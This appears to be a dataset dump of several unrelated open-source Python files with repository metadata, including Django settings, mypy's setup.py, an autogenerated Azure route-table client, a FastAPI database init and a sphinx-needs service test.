'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
# }
DATABASES = {
'default': {
'ENGINE': 'djongo',
'CLIENT': {
'host': os.environ.get("DATABASE_HOST", "mongodb"),
'port': int(os.environ.get("DATABASE_PORT", "27017"))
},
'NAME': os.environ.get("DATABASE_NAME", "djongo-tutorial-database")
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTH_USER_MODEL = 'auth.User'
# SALT FOR ENCODING/DECODING HASH KEYS
HASHID_FIELD_SALT = SECRET_KEY
HASHID_FIELD_ALLOW_INT_LOOKUP = True
# REDIS CONFIG
REDIS_HOSTNAME = os.environ.get("REDIS_HOSTNAME", "redis")
REDIS_READ_HOSTNAME = os.environ.get(
"REDIS_READ_HOSTNAME", REDIS_HOSTNAME
)
REDIS_PORT = os.environ.get("REDIS_PORT", "6379")
REDIS_CACHE_DB = os.environ.get("REDIS_CACHE_DB", "0")
REDIS_BROKER_DB = os.environ.get("REDIS_BROKER_DB", "1")
REDIS_ADDRESS = f"redis://{REDIS_HOSTNAME}:{REDIS_PORT}"
REDIS_READ_ADDRESS = f"redis://{REDIS_READ_HOSTNAME}:{REDIS_PORT}"
# CACHES
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": f"{REDIS_ADDRESS}/{REDIS_CACHE_DB}",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
},
"KEY_PREFIX": "rota_oeste",
},
}
# Cache time to live is 15 minutes.
CACHE_TTL = 60 * 15
# Channel
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [(REDIS_HOSTNAME, REDIS_PORT)],
},
},
}
ASGI_APPLICATION = "config.routing.application"
| 25.040609
| 91
| 0.676667
|
a393c4035205cbf06f4ccf8da870b0fb5f480b4b
| 7,289
|
py
|
Python
|
setup.py
|
Midiquin/mypy
|
a8f06c8651a4dd9b97f4989df70791b57a14e7f6
|
[
"PSF-2.0"
] | null | null | null |
setup.py
|
Midiquin/mypy
|
a8f06c8651a4dd9b97f4989df70791b57a14e7f6
|
[
"PSF-2.0"
] | null | null | null |
setup.py
|
Midiquin/mypy
|
a8f06c8651a4dd9b97f4989df70791b57a14e7f6
|
[
"PSF-2.0"
] | null | null | null |
#!/usr/bin/env python
import glob
import os
import os.path
import sys
if sys.version_info < (3, 5, 0):
sys.stderr.write("ERROR: You need Python 3.5 or later to use mypy.\n")
exit(1)
# we'll import stuff from the source tree, let's ensure is on the sys path
sys.path.insert(0, os.path.dirname(os.path.realpath(__file__)))
# This requires setuptools when building; setuptools is not needed
# when installing from a wheel file (though it is still neeeded for
# alternative forms of installing, as suggested by README.md).
from setuptools import setup
from setuptools.command.build_py import build_py
from mypy.version import __version__ as version
from mypy import git
git.verify_git_integrity_or_abort(".")
description = 'Optional static typing for Python'
long_description = '''
Mypy -- Optional Static Typing for Python
=========================================
Add type annotations to your Python programs, and use mypy to type
check them. Mypy is essentially a Python linter on steroids, and it
can catch many programming errors by analyzing your program, without
actually having to run it. Mypy has a powerful type system with
features such as type inference, gradual typing, generics and union
types.
'''.lstrip()
def find_package_data(base, globs, root='mypy'):
"""Find all interesting data files, for setup(package_data=)
Arguments:
root: The directory to search in.
globs: A list of glob patterns to accept files.
"""
rv_dirs = [root for root, dirs, files in os.walk(base)]
rv = []
for rv_dir in rv_dirs:
files = []
for pat in globs:
files += glob.glob(os.path.join(rv_dir, pat))
if not files:
continue
rv.extend([os.path.relpath(f, root) for f in files])
return rv
class CustomPythonBuild(build_py):
def pin_version(self):
path = os.path.join(self.build_lib, 'mypy')
self.mkpath(path)
with open(os.path.join(path, 'version.py'), 'w') as stream:
stream.write('__version__ = "{}"\n'.format(version))
def run(self):
self.execute(self.pin_version, ())
build_py.run(self)
cmdclass = {'build_py': CustomPythonBuild}
package_data = ['py.typed']
package_data += find_package_data(os.path.join('mypy', 'typeshed'), ['*.py', '*.pyi'])
package_data += find_package_data(os.path.join('mypy', 'xml'), ['*.xsd', '*.xslt', '*.css'])
USE_MYPYC = False
# To compile with mypyc, a mypyc checkout must be present on the PYTHONPATH
if len(sys.argv) > 1 and sys.argv[1] == '--use-mypyc':
sys.argv.pop(1)
USE_MYPYC = True
if os.getenv('MYPY_USE_MYPYC', None) == '1':
USE_MYPYC = True
if USE_MYPYC:
MYPYC_BLACKLIST = tuple(os.path.join('mypy', x) for x in (
# Need to be runnable as scripts
'__main__.py',
'sitepkgs.py',
os.path.join('dmypy', '__main__.py'),
# Uses __getattr__/__setattr__
'split_namespace.py',
# Lies to mypy about code reachability
'bogus_type.py',
# We don't populate __file__ properly at the top level or something?
# Also I think there would be problems with how we generate version.py.
'version.py',
# Written by someone who doesn't know how to deal with mypyc
'stubtest.py',
)) + (
# Don't want to grab this accidentally
os.path.join('mypyc', 'lib-rt', 'setup.py'),
)
everything = (
[os.path.join('mypy', x) for x in find_package_data('mypy', ['*.py'])] +
[os.path.join('mypyc', x) for x in find_package_data('mypyc', ['*.py'], root='mypyc')])
# Start with all the .py files
all_real_pys = [x for x in everything
if not x.startswith(os.path.join('mypy', 'typeshed') + os.sep)]
# Strip out anything in our blacklist
mypyc_targets = [x for x in all_real_pys if x not in MYPYC_BLACKLIST]
# Strip out any test code
mypyc_targets = [x for x in mypyc_targets
if not x.startswith((os.path.join('mypy', 'test') + os.sep,
os.path.join('mypyc', 'test') + os.sep,
os.path.join('mypyc', 'test-data') + os.sep,
))]
# ... and add back in the one test module we need
mypyc_targets.append(os.path.join('mypy', 'test', 'visitors.py'))
# The targets come out of file system apis in an unspecified
# order. Sort them so that the mypyc output is deterministic.
mypyc_targets.sort()
use_other_mypyc = os.getenv('ALTERNATE_MYPYC_PATH', None)
if use_other_mypyc:
# This bit is super unfortunate: we want to use a different
# mypy/mypyc version, but we've already imported parts, so we
# remove the modules that we've imported already, which will
# let the right versions be imported by mypyc.
del sys.modules['mypy']
del sys.modules['mypy.version']
del sys.modules['mypy.git']
sys.path.insert(0, use_other_mypyc)
from mypyc.build import mypycify
opt_level = os.getenv('MYPYC_OPT_LEVEL', '3')
force_multifile = os.getenv('MYPYC_MULTI_FILE', '') == '1'
ext_modules = mypycify(
mypyc_targets + ['--config-file=mypy_bootstrap.ini'],
opt_level=opt_level,
# Use multi-file compliation mode on windows because without it
# our Appveyor builds run out of memory sometimes.
multi_file=sys.platform == 'win32' or force_multifile,
)
else:
ext_modules = []
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Software Development',
]
setup(name='mypy',
version=version,
description=description,
long_description=long_description,
author='Jukka Lehtosalo',
author_email='jukka.lehtosalo@iki.fi',
url='http://www.mypy-lang.org/',
license='MIT License',
py_modules=[],
ext_modules=ext_modules,
packages=[
'mypy', 'mypy.test', 'mypy.server', 'mypy.plugins', 'mypy.dmypy',
'mypyc', 'mypyc.test',
],
package_data={'mypy': package_data},
scripts=['scripts/mypyc'],
entry_points={'console_scripts': ['mypy=mypy.__main__:console_entry',
'stubgen=mypy.stubgen:main',
'stubtest=mypy.stubtest:main',
'dmypy=mypy.dmypy.client:console_entry',
]},
classifiers=classifiers,
cmdclass=cmdclass,
# When changing this, also update mypy-requirements.txt.
install_requires=['typed_ast >= 1.4.0, < 1.5.0',
'typing_extensions>=3.7.4',
'mypy_extensions >= 0.4.3, < 0.5.0',
],
# Same here.
extras_require={'dmypy': 'psutil >= 4.0'},
python_requires=">=3.5",
include_package_data=True,
)
| 35.906404
| 95
| 0.613802
|
458eaf9e961d3542af8e1be562ae3b60ca4b4a50
| 24,077
|
py
|
Python
|
azure-mgmt-network/azure/mgmt/network/v2017_11_01/operations/route_tables_operations.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
azure-mgmt-network/azure/mgmt/network/v2017_11_01/operations/route_tables_operations.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2019-10-02T23:37:38.000Z
|
2020-10-02T01:17:31.000Z
|
azure-mgmt-network/azure/mgmt/network/v2017_11_01/operations/route_tables_operations.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-08-28T14:36:47.000Z
|
2018-08-28T14:36:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class RouteTablesOperations(object):
"""RouteTablesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-11-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-11-01"
self.config = config
def _delete_initial(
self, resource_group_name, route_table_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, route_table_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified route table.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_table_name: The name of the route table.
:type route_table_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
route_table_name=route_table_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables/{routeTableName}'}
def get(
self, resource_group_name, route_table_name, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets the specified route table.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_table_name: The name of the route table.
:type route_table_name: str
:param expand: Expands referenced resources.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: RouteTable or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_11_01.models.RouteTable or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables/{routeTableName}'}
def _create_or_update_initial(
self, resource_group_name, route_table_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'RouteTable')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteTable', response)
if response.status_code == 201:
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, route_table_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or updates a route table in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_table_name: The name of the route table.
:type route_table_name: str
:param parameters: Parameters supplied to the create or update route
table operation.
:type parameters: ~azure.mgmt.network.v2017_11_01.models.RouteTable
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns RouteTable or
ClientRawResponse<RouteTable> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.RouteTable]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.RouteTable]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
route_table_name=route_table_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables/{routeTableName}'}
def _update_tags_initial(
self, resource_group_name, route_table_name, tags=None, custom_headers=None, raw=False, **operation_config):
parameters = models.TagsObject(tags=tags)
# Construct URL
url = self.update_tags.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'TagsObject')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_tags(
self, resource_group_name, route_table_name, tags=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates a route table tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_table_name: The name of the route table.
:type route_table_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns RouteTable or
ClientRawResponse<RouteTable> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.RouteTable]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.RouteTable]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
route_table_name=route_table_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables/{routeTableName}'}
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all route tables in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of RouteTable
:rtype:
~azure.mgmt.network.v2017_11_01.models.RouteTablePaged[~azure.mgmt.network.v2017_11_01.models.RouteTable]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RouteTablePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RouteTablePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables'}
def list_all(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all route tables in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of RouteTable
:rtype:
~azure.mgmt.network.v2017_11_01.models.RouteTablePaged[~azure.mgmt.network.v2017_11_01.models.RouteTable]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RouteTablePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RouteTablePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/routeTables'}
| 46.124521
| 166
| 0.666985
|
06dd7d847c62c64f89bb2eebc7956d42fd7fe066
| 238
|
py
|
Python
|
db.py
|
ahmednafies/fastapi-alembic
|
bffa049aa97872516efda2f883263c3a1e505ec2
|
[
"MIT"
] | 1
|
2021-06-11T10:52:57.000Z
|
2021-06-11T10:52:57.000Z
|
db.py
|
ahmednafies/fastapi-alembic
|
bffa049aa97872516efda2f883263c3a1e505ec2
|
[
"MIT"
] | null | null | null |
db.py
|
ahmednafies/fastapi-alembic
|
bffa049aa97872516efda2f883263c3a1e505ec2
|
[
"MIT"
] | 2
|
2021-06-20T17:08:27.000Z
|
2021-07-16T00:52:50.000Z
|
from fastapi_databases import FastAPIDatabases
import os
from dotenv import load_dotenv
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
load_dotenv(os.path.join(BASE_DIR, ".env"))
db = FastAPIDatabases(os.environ["DATABASE_URL"])
| 26.444444
| 53
| 0.802521
|
2bfacd8bb0c7236c4c995497d65096a3d7d19dc8
| 2,155
|
py
|
Python
|
tests/test_services/test_service_basics.py
|
aris-bb/sphinxcontrib-needs
|
975815c21241fc1f5a58d8cf5504eb76ab95f73f
|
[
"MIT"
] | 1
|
2022-03-24T08:55:28.000Z
|
2022-03-24T08:55:28.000Z
|
tests/test_services/test_service_basics.py
|
aris-bb/sphinxcontrib-needs
|
975815c21241fc1f5a58d8cf5504eb76ab95f73f
|
[
"MIT"
] | null | null | null |
tests/test_services/test_service_basics.py
|
aris-bb/sphinxcontrib-needs
|
975815c21241fc1f5a58d8cf5504eb76ab95f73f
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import pytest
from sphinxcontrib.needs.services.base import BaseService
from sphinxcontrib.needs.services.manager import ServiceManager
class TestService(BaseService):
options = ["custom_option", "exists"]
def __init__(self, app, name, config, **kwargs):
self.custom_option = config.get("custom_option", False)
super().__init__()
def request(self, options):
data = [
{
"title": "service_test_title",
"id": "TEST_001",
"exists": options.get("exists", "False"),
"not_exists": options.get("not_exists", "False"),
"custom_option": self.custom_option,
# 'content': 'test_content'
}
]
return data
def debug(self, options):
debug_data = {
"request": {
"url": "http://dummy.company.com/my/service",
"user": "my_user",
},
"answer": {"status_code": 200, "body": {"item_amount": 2, "items": ["item_1", "item_2"]}},
}
return debug_data
class NoDebugService(BaseService):
options = []
def __init__(self, app, name, config, **kwargs):
super().__init__()
def request(self, options):
return []
@pytest.mark.parametrize("test_app", [{"buildername": "html", "srcdir": "doc_test/service_doc"}], indirect=True)
def test_service_creation(test_app):
app = test_app
app.build()
assert isinstance(app.needs_services, ServiceManager)
manager = app.needs_services
service = manager.get("testservice")
assert hasattr(service, "custom_option")
assert service.custom_option
html = Path(app.outdir, "index.html").read_text()
assert "service_test_title" in html
assert "TEST_001" in html
assert "custom_option_True" in html
assert "exists_True" in html
assert "not_exists" not in html
# Debug mode checks
# JS got not executed, so we can not test for generated HTML nodes.
assert "http://dummy.company.com/my/service" in html
assert '"items": ["item_1", "item_2"]' in html
| 26.9375
| 112
| 0.607889
|
f08e256ec8b252c9572fccebd7af70efc403151b
| 62
|
py
|
Python
|
Trial.py
|
ShuhaoZQGG/Python-Very-Beginner-to-Very-Intermediate
|
cfad98b1c1c175761d3a68861438562f7d410cb0
|
[
"MIT"
] | null | null | null |
Trial.py
|
ShuhaoZQGG/Python-Very-Beginner-to-Very-Intermediate
|
cfad98b1c1c175761d3a68861438562f7d410cb0
|
[
"MIT"
] | null | null | null |
Trial.py
|
ShuhaoZQGG/Python-Very-Beginner-to-Very-Intermediate
|
cfad98b1c1c175761d3a68861438562f7d410cb0
|
[
"MIT"
] | null | null | null |
myset = {-124,12,51,32,-1000}
print(myset.pop())
print(myset)
| 15.5
| 29
| 0.66129
|
9e5e3072f3b818019b509416bcca42514e33b707
| 2,851
|
py
|
Python
|
server/languages/python/module/LanguageModuleImp.py
|
adamrehn/language-toolbox
|
f86c39784b2a6952719afdd7c3769a6a6b5f2630
|
[
"MIT"
] | 2
|
2018-12-18T07:53:06.000Z
|
2020-02-28T11:13:21.000Z
|
server/languages/python/module/LanguageModuleImp.py
|
adamrehn/language-toolbox
|
f86c39784b2a6952719afdd7c3769a6a6b5f2630
|
[
"MIT"
] | null | null | null |
server/languages/python/module/LanguageModuleImp.py
|
adamrehn/language-toolbox
|
f86c39784b2a6952719afdd7c3769a6a6b5f2630
|
[
"MIT"
] | null | null | null |
from . import common_pb2 as common_messages
from . import language_pb2 as language_messages
from . import language_pb2_grpc as service
from os import path
